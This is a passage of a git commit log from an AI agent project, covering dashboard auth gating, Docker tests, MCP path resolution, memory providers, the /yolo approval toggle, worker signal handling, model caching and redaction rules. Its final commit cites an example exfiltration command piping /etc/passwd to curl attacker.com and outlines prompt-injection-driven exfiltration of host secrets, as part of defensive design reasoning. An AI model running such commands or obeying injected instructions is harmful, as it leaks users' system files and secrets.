(test_dashboard_slot_reports_up_when_enabled, test_dashboard_opt_in_starts,
test_dashboard_restarts_after_crash) — they all only sample pgrep
or s6-svstat and so caught the supervised process mid-restart
loop, appearing to pass while the dashboard was actually never
reaching a healthy state.

Fix: pin HERMES_DASHBOARD_INSECURE=1 on every test that enables
the dashboard but doesn't itself exercise the auth gate. Each
pinned site carries an inline comment pointing back to
test_dashboard_slot_reports_up_when_enabled for the full
rationale.

Failure 2 — test_dashboard_oauth_gate_engages_on_non_loopback_bind
(bug in the test I added in fb5125362)
The probe used urllib.request.urlopen() against /api/status. Under
the now-engaged OAuth gate /api/status no longer answers
unauthenticated callers (the gate middleware runs upstream of the
legacy _SESSION_TOKEN allowlist and 401s anything without a valid
session cookie). urlopen() raises HTTPError on the 401, the wrapper
treated that as "not ready yet", and the poll loop hit
timeout.

Fix: split the probe into a generic _http_probe() helper that
returns (status_code, body) for any HTTP response — including 401,
which IS the gate-engaged success signal. The helper feeds a
multi-line Python program over stdin via a POSIX heredoc so the
try/except branch reads naturally; far less fragile than the
earlier semicolon-laden -c one-liner.

The OAuth-gate test now verifies two independent observable
consequences of the gate being on:

  1. GET /api/auth/providers (publicly reachable through the gate
     so the login page can bootstrap) returns 200 with `nous` in
     the provider list — proves the bundled provider registered.
  2. GET /api/status returns 401 — proves the OAuth gate runs
     upstream of the legacy public-paths allowlist and is
     actively intercepting unauthenticated callers.

The insecure-opt-out test still hits /api/status, but now
asserts status_code == 200 first (proves the gate is bypassed)
before parsing the JSON for auth_required: false (proves the
gate-state flag is also correctly off).
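
The key idea of the probe fix, treating an HTTP error status as an answer rather than as "not ready", can be sketched host-side as below. `http_probe` is a hypothetical simplification; the helper in the commit runs its program inside the container over stdin.

```python
import urllib.error
import urllib.request


def http_probe(url, timeout=5):
    """Return (status_code, body) for any HTTP response, or None if unreachable."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # 4xx/5xx still means the server answered; 401 is the gate-engaged signal.
        return err.code, err.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        # Connection refused, timeout, DNS failure: the server is not ready yet.
        return None
```

`HTTPError` must be caught before `URLError` because it is a subclass; with the order reversed, a 401 would again be indistinguishable from a refused connection.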

Verified locally end-to-end against a fresh image build on a
real Docker daemon: all 41 tests under tests/docker/ pass in
2m38s, including the two formerly-failing dashboard tests and
the three sibling tests that were passing by accident.
2026-05-29 10:30:52 +10:00
Teknium f3acdd94fe Merge pull request #30698 from NousResearch/refactor/use-ds-primitives
refactor(web): consume DS primitives, remove local component copies
2026-05-28 17:29:28 -07:00
Teknium 78a54d2c00 fix(skills-page): source pills and category sidebar collapsed to All only (#34194)
Regression from PR #33809 (lazy-fetch refactor). The `sources` and
`categoryEntries` useMemo blocks were derived from `allSkillsLocal`
but had empty/incomplete deps arrays — so they computed once at mount
when the catalog was still `[]`, then never recomputed when the fetch
resolved.

Symptom: live site shows only the "All 87,639" source button and
"All Skills 87,639" category — no per-source pills (ClawHub, skills.sh,
LobeHub, etc.) and no category breakdown. Filtering by source/category
is unusable.

Fix: add `allSkillsLocal` to both deps arrays so they recompute when
data arrives. Local build green on en + zh-Hans.
2026-05-28 17:11:40 -07:00
Ben e7c99651fb fix(mcp): resolve bare npx/npm/node against /usr/local/bin
When the Hermes Docker image runs an stdio MCP server configured with an
explicit env.PATH that omits /usr/local/bin (a common pattern when users
hand-author PATH for sandboxing), the MCP env-filter passes that narrow
PATH straight through to the subprocess. _resolve_stdio_command's
fallback for bare 'npx' / 'npm' / 'node' commands only checked
$HERMES_HOME/node/bin/ and ~/.local/bin/, so execvp() failed with
'[Errno 2] No such file or directory: npx' on every Node-based stdio
MCP server (Railway, Anthropic, GitHub Copilot, etc.).

The naive workaround — symlink /usr/local/bin/npx into the user's PATH —
fails one layer deeper because npx's shebang re-execs /usr/bin/env node
and node also lives at /usr/local/bin/node.

Fix: add /usr/local/bin/<cmd> as a third candidate in the fallback list.
This is the canonical install location for Node on:
  - Linux from-source builds
  - the upstream node:bookworm-slim image, which the Hermes Docker
    image copies node + npm + corepack from since #4977 (the Node 22 LTS
    refactor that exposed this)
  - macOS Homebrew on Intel

Because the resolver already calls _prepend_path(resolved_env, command_dir)
after locating the command, /usr/local/bin gets prepended to the env's
PATH automatically, which also fixes the second-layer shebang failure
(npx-cli.js can now find node).

Scope is intentionally narrow: the fix activates only when the bare
command isn't otherwise locatable through the user's PATH. Users who
explicitly narrowed PATH for a non-Node MCP server see no change in
behavior.
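
A sketch of the fallback order and the PATH prepend. `resolve_bare_command` and its injectable `exists` check are hypothetical and much simpler than `_resolve_stdio_command`; only the three candidate locations come from the commit message.

```python
import os
import shutil

_NODE_COMMANDS = {"npx", "npm", "node"}


def resolve_bare_command(command, env, hermes_home, exists=os.path.isfile):
    """Return (command, env), resolving bare Node commands via fallback dirs."""
    path = env.get("PATH", "")
    if command not in _NODE_COMMANDS or shutil.which(command, path=path):
        return command, env  # not a bare Node command, or already locatable
    candidates = [
        os.path.join(hermes_home, "node", "bin", command),
        os.path.join(os.path.expanduser("~"), ".local", "bin", command),
        os.path.join("/usr/local/bin", command),  # the candidate this fix adds
    ]
    for candidate in candidates:
        if exists(candidate):
            command_dir = os.path.dirname(candidate)
            new_env = dict(env)
            # Prepend the directory so npx's `/usr/bin/env node` shebang works too.
            new_env["PATH"] = command_dir + os.pathsep + path if path else command_dir
            return candidate, new_env
    return command, env
```

The caller's `env` dict is copied rather than mutated, so a narrowed PATH stays as written unless a fallback candidate is actually used.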

Tested:
  - tests/tools/test_mcp_tool_issue_948.py: new test
    test_resolve_stdio_command_falls_back_to_usr_local_bin (mirrors the
    existing hermes-node-bin fallback test)
  - Full MCP test suite: 254/254 pass across 7 test files
  - E2E against a freshly-built Docker image: reproduced the original
    failure mode (env.PATH=/opt/data/bin:/usr/bin:/bin), confirmed the
    resolver returns /usr/local/bin/npx and prepends /usr/local/bin to
    PATH; subprocess.run of the resolved command prints '10.9.8' and
    exits 0 with empty stderr
  - Negative E2E on the host (where Node is already on PATH via mise):
    resolver still hits the mise install dir, /usr/local/bin candidate
    is not consulted, PATH is unchanged
2026-05-29 10:05:42 +10:00
Ben fb51253620 docker: opt in to dashboard --insecure via env var, never derive from bind host
The s6 dashboard run script flipped `--insecure` on whenever
`HERMES_DASHBOARD_HOST` was anything other than 127.0.0.1 / localhost.
That comment ("the dashboard refuses otherwise") predates the OAuth
auth gate: back when it was written, `start_server` would SystemExit
on any non-loopback bind, so the run script's `--insecure` was the
only way to make in-container deployments work at all.

The gate has since been replaced by `should_require_auth(host,
allow_public)`, which engages the OAuth flow when a
`DashboardAuthProvider` is registered (the bundled `dashboard_auth/nous`
provider auto-registers on `HERMES_DASHBOARD_OAUTH_CLIENT_ID`) and
fails closed with a specific operator-facing error when none is. The
host-derived `--insecure` ran upstream of all that and silently
disabled the gate on every container-deployed dashboard.

Most visible under the portal's wildcard-subdomain rollout: every Fly
machine binds 0.0.0.0 so the edge can reach Flycast, every machine
boots with the correct `HERMES_DASHBOARD_OAUTH_CLIENT_ID`, the nous
provider registers — and `/api/status` still returns
`{"auth_required": false, "auth_providers": ["nous"]}` because the
run script disabled the gate before `start_server` ever saw the
request. The dashboard SPA was served to anyone, no `/login` redirect,
no OAuth challenge.

Fix: derive `--insecure` from an explicit opt-in env var,
`HERMES_DASHBOARD_INSECURE` (truthy values matching the rest of the
s6 boolean envs: 1, true, TRUE, True, yes, YES, Yes). Operators on
trusted LANs behind a reverse proxy without the OAuth contract
(the existing `docker-compose.windows.yml` use case) opt in
explicitly; portal-managed agent deployments leave it unset and let
the gate engage.
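
The run script itself is shell; the following Python model only
illustrates the decision rule. The function name dashboard_args and the
--host flag are assumptions made for the sketch; the env var names and
the truthy set are taken from this message.

```python
# Truthy spellings accepted for HERMES_DASHBOARD_INSECURE (from the message).
TRUTHY = {"1", "true", "TRUE", "True", "yes", "YES", "Yes"}


def dashboard_args(env):
    """Build dashboard arguments from the environment (hypothetical helper)."""
    host = env.get("HERMES_DASHBOARD_HOST", "127.0.0.1")
    args = ["--host", host]  # '--host' is an assumed flag name
    # The bind host no longer influences --insecure; only the explicit
    # opt-in variable does.
    if env.get("HERMES_DASHBOARD_INSECURE", "") in TRUTHY:
        args.append("--insecure")
    return args
```

Under this rule a 0.0.0.0 bind without the opt-in leaves the auth gate
in charge, which is the behaviour the portal deployments need.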

`docker-compose.windows.yml` already passes `--insecure` on the
`command:` array directly (line 38), so it doesn't depend on the s6
auto-injection. No compose-file change required.

Tests:
* `tests/test_docker_home_override_scripts.py` — extends the existing
  static-text guard with a regression assertion that the legacy
  host-derived case-statement is gone and the new env-var opt-in is
  present (locks against accidental revert).
* `tests/docker/test_dashboard.py` — adds two Docker-in-Docker tests
  exercising the actual `/api/status` round-trip:
  - 0.0.0.0 bind + `HERMES_DASHBOARD_OAUTH_CLIENT_ID` → gate engaged
  - 0.0.0.0 bind + `HERMES_DASHBOARD_INSECURE=1` → gate disabled

Docs:
* `website/docs/user-guide/docker.md` + zh-Hans i18n — adds the new
  env var to the table, replaces the stale prose ("the entrypoint
  no longer auto-enables insecure mode" — which until this PR was
  flat-out wrong) with an accurate description of the gate's
  trigger conditions and the explicit opt-out.

shellcheck clean. Python static-text test passes locally. Behavioural
test will run against any future image build (CI's Docker harness).
2026-05-29 09:56:40 +10:00
Evo ef009a987a docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE from #33583 (#33751)
* docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (en)

* docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (en)

* docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (zh)
2026-05-29 09:44:53 +10:00
BROCCOLO1D 130396c658 ci(docker): avoid gha cache on arm64 PR builds 2026-05-29 09:43:48 +10:00
Austin Pickett a5c1f925b5 fix(web): stop /api/auth/me 401 from triggering a reload loop
In loopback mode the dashboard's identity probe (/api/auth/me) returns
401 by design — AuthWidget swallows it and renders nothing. But the
probe routed through fetchJSON, whose loopback 401 handler treats a 401
as a rotated session token and full-page-reloads to pick up a fresh one.
That reload is guarded by a one-shot sessionStorage flag which every
*successful* request clears, so with auth/me reliably 401ing and the
other dashboard calls (status/config/sessions) reliably succeeding, the
guard never sticks and the page reload-loops indefinitely (the "boot
flash").

Add an allowUnauthorized option to fetchJSON that skips only the loopback
stale-token reload (the 401 still throws so AuthWidget can catch it, and
the gated-mode login_url envelope redirect is unaffected), and use it for
getAuthMe.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-28 16:58:42 -04:00
kshitij 11d93096b3 Merge pull request #34097 from kshitijk4poor/salvage/memori-trace-messages
feat: expose completed-turn message context to memory providers (salvage #28065)
2026-05-28 13:56:07 -07:00
kshitijk4poor d464d08a5f chore: add devwdave to AUTHOR_MAP
Maps both commit emails (david@memorilabs.ai, dave@devwdave.com) used on
#28065 to the devwdave GitHub account so the contributor audit in
scripts/release.py passes.
2026-05-29 02:16:43 +05:30
Dave Heritage 5a95fb2e14 feat: expose completed-turn message context to memory providers
Adds an optional `messages` keyword to the `MemoryProvider.sync_turn`
contract so external/community memory plugins can receive the OpenAI-style
conversation message list for the completed turn — including assistant tool
calls and tool result content — not just the final assistant text.

Dispatch uses signature inspection (`_provider_sync_accepts_messages`): only
providers that declare a `messages` parameter (or `**kwargs`) receive it; all
existing in-tree providers keep their legacy text-only signature and are
called unchanged. No structured-trace envelope is added to core — providers
reconstruct whatever they need from the standard message list.
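
A sketch of signature-based dispatch along these lines, using the
standard inspect module. The helper names and the positional arguments
of sync_turn (user_text, assistant_text) are assumptions for
illustration; the real contract may differ.

```python
import inspect


def accepts_messages(sync_turn):
    """True if the callable can take a `messages` keyword argument."""
    try:
        params = inspect.signature(sync_turn).parameters.values()
    except (TypeError, ValueError):
        return False  # no introspectable signature: treat as legacy
    for p in params:
        if p.kind is inspect.Parameter.VAR_KEYWORD:
            return True  # **kwargs swallows the new keyword
        if p.name == "messages" and p.kind in (
            inspect.Parameter.POSITIONAL_OR_KEYWORD,
            inspect.Parameter.KEYWORD_ONLY,
        ):
            return True
    return False


def dispatch_sync_turn(provider, user_text, assistant_text, messages):
    """Call provider.sync_turn, passing `messages` only when declared."""
    if accepts_messages(provider.sync_turn):
        return provider.sync_turn(user_text, assistant_text, messages=messages)
    return provider.sync_turn(user_text, assistant_text)
```

The point of inspecting rather than try/except on TypeError is that a
legacy provider is never called with an argument it did not declare, so
a TypeError raised inside the provider is not mistaken for a signature
mismatch.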

Also documents Memori as a standalone community memory provider.

Salvaged from #28065 — rebased onto current main.

Co-authored-by: Dave Heritage <david@memorilabs.ai>
2026-05-29 02:16:43 +05:30
Austin Pickett 0acb7f4583 fix(nix): update hermes-web npmDepsHash for @nous-research/ui 0.18.2
The web/package-lock.json changed when bumping @nous-research/ui to
0.18.2, so the fetchNpmDeps fixed-output hash in nix/web.nix was stale.
Update it to the hash prefetch-npm-deps computes for the new lockfile.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-28 16:24:01 -04:00
Austin Pickett a3cd974ee7 chore(web): bump @nous-research/ui to 0.18.2
Picks up the deferred GPU-tier detection fix (design-language) that
stops the synchronous WebGL probe from blocking first paint, which was
causing a boot-time flash in the dashboard backdrop.

nix/web.nix npmDepsHash is a placeholder here and is corrected in the
follow-up commit using the hash reported by the Nix CI job.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-28 16:20:14 -04:00
Teknium ea5a6c216b ci(deploy): allow workflow_dispatch to also trigger Vercel deploy (#34081)
Today's three skills-index PRs (#33748, #33809, #34025) merged to main
but the live Vercel-hosted docs site didn't pick them up — Vercel is
fired by the deploy-vercel job, which was gated on release events only.
Out-of-band main commits between releases couldn't reach Vercel without
cutting a tag.

Widen the gate to also include workflow_dispatch so 'gh workflow run
deploy-site.yml' can ship pending main changes to Vercel on demand.
Release-tag behavior is unchanged.
2026-05-28 13:17:58 -07:00
kshitijk4poor 4df62d239e docs(hindsight): correct recall_types scope — tool path is also narrowed
The original change's description and README claimed the per-call
hindsight_recall tool was unaffected by the new observation-only default.
That is inaccurate: hindsight_recall reads the same self._recall_types
instance attribute as the auto-recall prefetch path, and RECALL_SCHEMA
exposes no per-call types argument, so the model cannot override it.
Narrowing the default narrows BOTH paths.

Corrects the README behavior-change note, the config-table row, and the
get_config_schema description to reflect that recall_types applies to
both auto-recall and the hindsight_recall tool.
2026-05-28 13:07:20 -07:00
Nicolò Boschi 490b3e76b1 feat(hindsight): default recall_types to observation only
Auto-recall used to surface every fact type Hindsight had on the
session — `world`, `experience`, and `observation`. That triple-ships
the same underlying signal in three different framings: observations
are the concrete events the user said/did/asked, while world and
experience facts are aggregate summaries Hindsight derives from those
exact observations. Including all three burns most of
`recall_max_tokens` on rephrasings, crowds out events the model
actually needs to see, and produces effective duplicates in the
prompt — observations themselves are deduplicated by construction
so observation-only recall is denser per token and closer to
conversational ground truth.

Change
------
- Default `_recall_types = ["observation"]` (was `None`, which
  delegated to server-side "return everything").
- `initialize()` now treats a missing `recall_types` config the same
  way; also accepts comma-separated strings for parity with `recall_tags`.
- An explicit `recall_types=[]` config falls back to the default rather
  than disabling the filter (would silently widen recall vs. the new
  default).
- Added to `get_config_schema()` so it's discoverable via `hermes config`.
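
The normalization rules in the list above can be sketched as follows.
normalize_recall_types is a hypothetical name, not the function used in
the plugin; only the rules themselves (missing value, CSV string, empty
list) come from this message.

```python
DEFAULT_RECALL_TYPES = ["observation"]


def normalize_recall_types(value):
    """Turn a raw config value into a non-empty list of recall types."""
    if value is None:
        # Missing config key: use the new observation-only default.
        return list(DEFAULT_RECALL_TYPES)
    if isinstance(value, str):
        # Comma-separated string, for parity with recall_tags.
        items = [part.strip() for part in value.split(",")]
    else:
        items = [str(item).strip() for item in value]
    items = [item for item in items if item]
    # An empty list falls back to the default instead of disabling the
    # filter, which would silently widen recall.
    return items or list(DEFAULT_RECALL_TYPES)
```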

Per-call `hindsight_recall` tool invocations are unaffected — they
already only forward `types` when the caller passes the argument.

Docs / migration
----------------
plugins/memory/hindsight/README.md grows a "Behavior change" callout
explaining the why (no-duplicates, information-efficient) and how to
restore the legacy broad recall:

    "recall_types": "observation,world,experience"   # or a JSON list

in `~/.hermes/hindsight/config.json`.

Tests
-----
- `test_default_values` updated for the new default.
- New cases: explicit list override, CSV string accepted, empty list
  falls back to default (not "wider than default").
2026-05-28 13:07:20 -07:00
teknium1 321ce94e25 test: update non-minimax overflow test to match new keep-context behavior
The old test asserted that a non-MiniMax provider returning a generic
overflow (no provider-reported max) would step down to the 128K probe
tier. The salvaged fix from #33673 deliberately removes that step-down
because guessed tiers cause configured 1M sessions to silently shrink.

Update the test to assert the new contract: keep the configured 200K
window and rely on compression instead.
2026-05-28 12:26:53 -07:00
teknium1 c5e496e1c0 chore: map yanghongda@jackyun.com -> yangguangjin in AUTHOR_MAP 2026-05-28 12:26:53 -07:00
yanghd 7a3c38d0b7 fix: stop probe stepdown without provider context limit 2026-05-28 12:26:53 -07:00
kshitijk4poor 5cbc3fbdcc fix(cli): /yolo in chat must enable session bypass, not just set env var
The CLI's in-chat `/yolo` toggle mutated `os.environ["HERMES_YOLO_MODE"]`
but had no effect because `tools/approval.py:_YOLO_MODE_FROZEN` captures
that env var once at module-import time (a deliberate security floor that
keeps prompt-injected skills from flipping the bypass mid-run). By the
time the user reaches `/yolo` in a running CLI session, `tools.approval`
has already been imported, so the env flip after that is a silent no-op.

Result: `/yolo` advertised "⚠ YOLO" in the status bar while every
dangerous command still hit the approval prompt or got denied.  Only
`hermes --yolo` (set before tool imports), `HERMES_YOLO_MODE=1 hermes ...`,
and `hermes config set approvals.mode off` actually bypassed.

This patches the CLI to match what the gateway and TUI `/yolo` handlers
already do, plus mirrors the TUI's session-rename YOLO transfer:

* `_toggle_yolo()` now calls `enable_session_yolo(self.session_id)` /
  `disable_session_yolo(self.session_id)` instead of touching the env
  var.  Matches `gateway/run.py:_handle_yolo_command` and the
  `tui_gateway/server.py` key=="yolo" branch.
* Around each `run_conversation()` call, `run_agent()` now binds
  `set_current_session_key(self.session_id)` so
  `tools.approval.is_current_session_yolo_enabled()` resolves against
  the same key the toggle writes under, and resets it in `finally` so
  reused threads don't see stale identity.  Matches the
  `tui_gateway/server.py` and `gateway/platforms/api_server.py` binding
  pattern.
* New `_transfer_session_yolo()` helper carries YOLO bypass state
  across `self.session_id` reassignments — `/branch` forking into a
  new session id and the auto-compression sync that rotates into a
  fresh continuation session id.  Without this, the same UX failure
  mode the rest of this fix addresses (silent `/yolo` no-op) would
  reappear after a single `/branch` or auto-compression event.
  Mirrors `tui_gateway/server.py` ~line 1297-1305.
* New `_is_session_yolo_active()` helper replaces the two
  `bool(os.getenv("HERMES_YOLO_MODE"))` reads in the status-bar
  builders, so the badge reflects the actual bypass state.  Uses
  `getattr(self, "session_id", None)` so status-bar test fixtures
  that bypass `__init__` via `HermesCLI.__new__(HermesCLI)` don't
  trip `AttributeError` (the builders swallow exceptions silently
  and lose every field after the failure).  Still honors
  `_YOLO_MODE_FROZEN` so `hermes --yolo` keeps lighting it up.

The `_YOLO_MODE_FROZEN` security freeze is preserved — env-var-based
opt-in still only works when set before process start, which is the
documented contract for `--yolo` / `HERMES_YOLO_MODE`.

Closes #33925
2026-05-28 12:10:21 -07:00
teknium1 f30db14ced fix(kanban): SIGTERM on worker must terminate the process (#28181)
The single-query signal handler in cli.py raises KeyboardInterrupt on
SIGTERM/SIGHUP. For interactive 'hermes chat -q' that unwinds the main
thread cleanly. For kanban workers spawned by the dispatcher, the
worker process is likely to have a non-daemon thread alive (terminal
_wait_for_process, custom plugins, etc.). With KeyboardInterrupt only
the main thread unwinds; the non-daemon thread keeps the process alive,
the gateway has already restarted, and the dispatcher's _pid_alive
check returns True forever — task stuck in 'running' indefinitely.

When HERMES_KANBAN_TASK is set (dispatcher-spawned worker), flush
logging + stdout/stderr, then os._exit(0) instead of raising
KeyboardInterrupt. The kernel reclaims the PID immediately, and the
existing zombie-state detection in _pid_alive flips the task to
crashed on the next dispatcher tick. detect_crashed_workers then
re-spawns it on the following tick — no manual recovery needed.

A SIGALRM(2s) deadman is armed before the flush so a pathological
blocking-I/O flush can't wedge the worker forever. In practice the
reporter measured flush in <1ms; the alarm is a failsafe, never
the common path.
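
A sketch of an env-gated handler of this shape, assuming a POSIX host.
make_sigterm_handler and its injectable arguments are hypothetical and
exist so the logic can be exercised without killing the interpreter;
the real handler in cli.py may be structured differently.

```python
import logging
import os
import signal
import sys


def _arm_deadman(seconds, hard_exit):
    """Force an exit if flushing blocks for longer than `seconds`."""
    if hasattr(signal, "SIGALRM"):  # not available on Windows
        signal.signal(signal.SIGALRM, lambda signum, frame: hard_exit(0))
        signal.alarm(seconds)


def make_sigterm_handler(env=os.environ, hard_exit=os._exit,
                         arm_deadman=_arm_deadman):
    def handler(signum, frame):
        if env.get("HERMES_KANBAN_TASK"):
            # Dispatcher-spawned worker: arm the failsafe, flush, then
            # exit without waiting for non-daemon threads.
            arm_deadman(2, hard_exit)
            logging.shutdown()
            for stream in (sys.stdout, sys.stderr):
                try:
                    stream.flush()
                except Exception:
                    pass  # a broken pipe must not block the exit
            hard_exit(0)
            return  # only reached when a fake hard_exit is injected
        # Interactive path: unwind the main thread as before.
        raise KeyboardInterrupt
    return handler
```

A worker would install it with
signal.signal(signal.SIGTERM, make_sigterm_handler()). os._exit skips
atexit hooks and thread joins, which is why the flush happens first.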

Interactive (non-kanban) chat -q is unchanged — the env-gated branch
only fires for dispatcher-spawned workers.

Live verification on this machine:
- Without HERMES_KANBAN_TASK + non-daemon thread alive: process hangs
  alive 4+ seconds after SIGTERM. Dispatcher's _pid_alive returns
  True → task stuck.
- With HERMES_KANBAN_TASK + same non-daemon thread: process exits in
  0.10s via os._exit(0). Dispatcher reclaims on next tick.

Tests:
- tests/hermes_cli/test_signal_handler_kanban_worker.py (3 cases):
  end-to-end subprocess test with a non-daemon thread,
  HERMES_KANBAN_TASK env, SIGTERM, dispatcher-style _pid_alive check.
  Plus a source-level invariant test catching future refactors that
  drop the env-gated exit.
- 452/452 kanban tests pass.

Co-authored-by: andrewhosf <andrewho.sf@gmail.com>
2026-05-28 11:59:58 -07:00
Teknium 3a9bc9d88a fix(model picker): unify /model and hermes model lists, add disk cache (#33867)
* fix(model picker): unify /model and `hermes model` model lists, add disk cache

The /model slash picker and `hermes model` were drifting apart. /model
read the raw static `OPENROUTER_MODELS` list (31 entries, including 5
that fail at runtime — no tool-call support or absent from live catalog),
while `hermes model` ran the same list through the live OpenRouter
/v1/models tool-support filter and showed 26 valid entries. Same problem
existed for every other authed provider: /model used curated static
lists, `hermes model` used live /v1/models.

Unifies both surfaces on `provider_model_ids()` and adds a generic
disk-cached wrapper so the picker stays snappy.

Changes
- hermes_cli/models.py: new `cached_provider_model_ids()` —
  ~/.hermes/provider_models_cache.json, 1h TTL, per-provider entries
  keyed by credential fingerprint (env vars + OAuth file mtimes).
  Stale-data-beats-no-data on transient failures. Pair with
  `clear_provider_models_cache(provider=None)`.
- hermes_cli/models.py: `provider_model_ids("nous")` now falls back
  to the docs-hosted manifest (not the in-repo snapshot) when the live
  Portal /models call fails — preserves the model_catalog regression
  guarantee while still going through the unified pathway.
- hermes_cli/model_switch.py: `list_authenticated_providers` routes
  sections 1, 2, and 2b through `cached_provider_model_ids(slug)` with
  curated fallback when the live fetcher comes up empty.
- hermes_cli/model_switch.py: `parse_model_flags` extended to a
  4-tuple, parses `--refresh`.
- cli.py / gateway/run.py / tui_gateway/server.py: updated unpacking;
  CLI + gateway wire `--refresh` to `clear_provider_models_cache()`.
- hermes_cli/main.py: `hermes model --refresh` argparse flag.
- hermes_cli/commands.py: `/model` args_hint advertises `--refresh`.
- tests/hermes_cli/test_inventory.py: refresh stale comment.

Live PTY parity verification
- /model → OpenRouter row: `(26 models)` (was 31, with broken entries)
- `hermes model` → OpenRouter: 26 models (unchanged)
- The 5 dropped entries: `pareto-code` (no tool-call support),
  `gemini-3-pro-image-preview` (no tool-call support),
  `elephant-alpha`, `hy3-preview:free`, `ring-2.6-1t:free` (gone
  from OpenRouter's live catalog).

Live PTY timing
- First /model open, empty cache: 4624 ms (full network round trip
  across every authed provider)
- Second /model open, warm cache: 51 ms (90× faster)
- `/model --refresh` clears the disk cache and re-fetches.

Cache schema (~/.hermes/provider_models_cache.json, ~3 KB):
  { "anthropic": {"fp": "<sha256:16>", "at": 1748..., "models": [...]},
    ... }
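
A sketch of a TTL cache using the schema above ("fp", "at", "models").
The function name cached_model_ids, its arguments, and the choice to
serve stale data only when the fingerprint still matches are
assumptions for illustration, not the behaviour of
cached_provider_model_ids().

```python
import json
import time
from pathlib import Path

TTL_SECONDS = 3600  # 1h TTL, as described in the Changes list


def cached_model_ids(provider, fingerprint, fetch, cache_path, now=None):
    """Return model ids for `provider`, using a JSON file as a cache."""
    now = time.time() if now is None else now
    path = Path(cache_path)
    try:
        cache = json.loads(path.read_text())
    except (OSError, ValueError):
        cache = {}  # missing or corrupt cache file: start empty
    if not isinstance(cache, dict):
        cache = {}

    entry = cache.get(provider)
    same_creds = isinstance(entry, dict) and entry.get("fp") == fingerprint
    if same_creds and now - entry.get("at", 0) < TTL_SECONDS:
        return entry["models"]  # warm hit

    try:
        models = list(fetch(provider))
    except Exception:
        models = []  # transient failure is handled below

    if not models:
        # Stale data beats no data, but only for the same credentials.
        return entry.get("models", []) if same_creds else []

    cache[provider] = {"fp": fingerprint, "at": now, "models": models}
    path.write_text(json.dumps(cache))
    return models
```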

Targeted tests: tests/hermes_cli/ + gateway model tests + tui_gateway —
5855/5855 pass.

* fix(model picker): use blake2b for cache fingerprint to silence CodeQL

py/weak-sensitive-data-hashing flagged the sha256 call in
_credential_fingerprint() as a high-severity alert because the input
includes env var values whose names contain *_API_KEY / *_TOKEN.

The hash is used solely as a cache-bust identity — never reversed, never
stored, collisions are harmless (worst case: cache miss → live re-fetch).
blake2b serves the same purpose and isn't flagged by this rule.

Functional behavior identical: 16-hex-char digest, cache hit/miss logic
unchanged. Live re-verified — 26 OpenRouter models, warm-cache 78ms.
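
For reference, a 16-hex-character blake2b identity can be produced as
below. The helper name and the shape of its input (a name-to-value
mapping) are assumptions; the real _credential_fingerprint() may
truncate a longer digest instead of requesting an 8-byte one.

```python
import hashlib


def credential_fingerprint(parts):
    """Return a 16-hex-char cache-bust identity for a mapping of inputs."""
    h = hashlib.blake2b(digest_size=8)  # 8 bytes -> 16 hex characters
    for name, value in sorted(parts.items()):
        # NUL separators keep ("ab", "c") distinct from ("a", "bc").
        h.update(name.encode("utf-8"))
        h.update(b"\0")
        h.update(str(value).encode("utf-8"))
        h.update(b"\0")
    return h.hexdigest()
```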
2026-05-28 11:33:16 -07:00
Teknium 5f66c36470 fix(redact): pass web URLs through unchanged (#34029)
* fix(redact): pass web URLs through unchanged

Magic-link checkout URLs, OAuth callbacks the agent is meant to follow,
and pre-signed share URLs were getting `?token=***` / `?code=***` /
`?signature=***` blanket-redacted by parameter NAME, which breaks any
skill that has to round-trip a URL through history (the model's tool
call arguments get sanitized before persistence — the live call fires
with the real URL, but the next turn sees `***`).

Joe Rinaldi Johnson hit this with a checkout-acceleration skill that
uses magic links in URLs.

Drops three call sites from `redact_sensitive_text`:
- `_redact_url_query_params` (was redacting `access_token`, `token`,
  `api_key`, `code`, `signature`, `key`, `auth`, etc.)
- `_redact_url_userinfo` (was redacting `https://user:pass@host`)
- `_redact_http_request_target_query_params` (was redacting access-log
  request targets like `"POST /hook?password=... HTTP/1.1"`)

The helpers themselves are kept in the module — still importable by
anything that wants to opt in explicitly.

Still redacted (unchanged):
- Vendor-prefix credential shapes (sk-, ghp_, AKIA, gAAAA, etc.)
  anywhere they appear, including inside URLs — see the
  `test_known_prefix_inside_url_still_redacted` case.
- JWTs (`eyJ...`)
- DB connection-string passwords (`postgres://admin:pw@host`) —
  these are connection strings, not web URLs the agent navigates to.
- Authorization headers, ENV assignments, JSON `apiKey`/`token` fields,
  Telegram bot tokens, private key blocks, Discord mentions, E.164
  phone numbers, and form-urlencoded bodies (request bodies, not URLs).

Tests: replaces `TestUrlQueryParamRedaction` + `TestUrlUserinfoRedaction`
with `TestWebUrlsNotRedacted`, asserting representative URLs (OAuth
callback, magic link, S3 pre-signed, websocket, userinfo, access log)
pass through unchanged. Adds positive cases proving the prefix and DB
connstr nets still fire. 74 redact tests + 10 browser-exfil + 16 PII
redaction tests all pass.

* test(codex_app_server): drop URL-query assertion from stderr-tail redaction test

The test bundled (a) sk-live-* credential-prefix redaction with (b)
URL query-param redaction. (a) is still in effect via _PREFIX_RE;
(b) was the contract we just removed in the parent commit so the
'querysecret12345' assertion stopped holding. Keep the credential-shape
assertion, drop the URL-query one.

Send-message tool's local _URL_SECRET_QUERY_RE in tools/send_message_tool.py
is independent of agent/redact.py and unchanged — its tests
(test_top_level_send_failure_redacts_query_token,
test_http_error_redacts_access_token_in_exception_text) still pass.
2026-05-28 11:32:39 -07:00
Teknium 7a8589e782 fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022)
PR #29523 restricted MEDIA: paths and bare local paths in agent output to
files under the Hermes media cache or an operator-allowlisted root, with
a 10-minute recency window as a fallback. The intent was to defend
against prompt-injection-driven exfiltration of host secrets, but in the
default single-user setup the asymmetry doesn't earn its keep: we accept
any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...)
and the agent already has terminal access — anything that can convince
it to emit a MEDIA: tag for /etc/passwd can equally convince it to
`cat /etc/passwd | curl attacker.com`.

Practical breakage: agents that produced an .md, .pdf, or other
artifact more than ~10 minutes ago, or outside the cache allowlist,
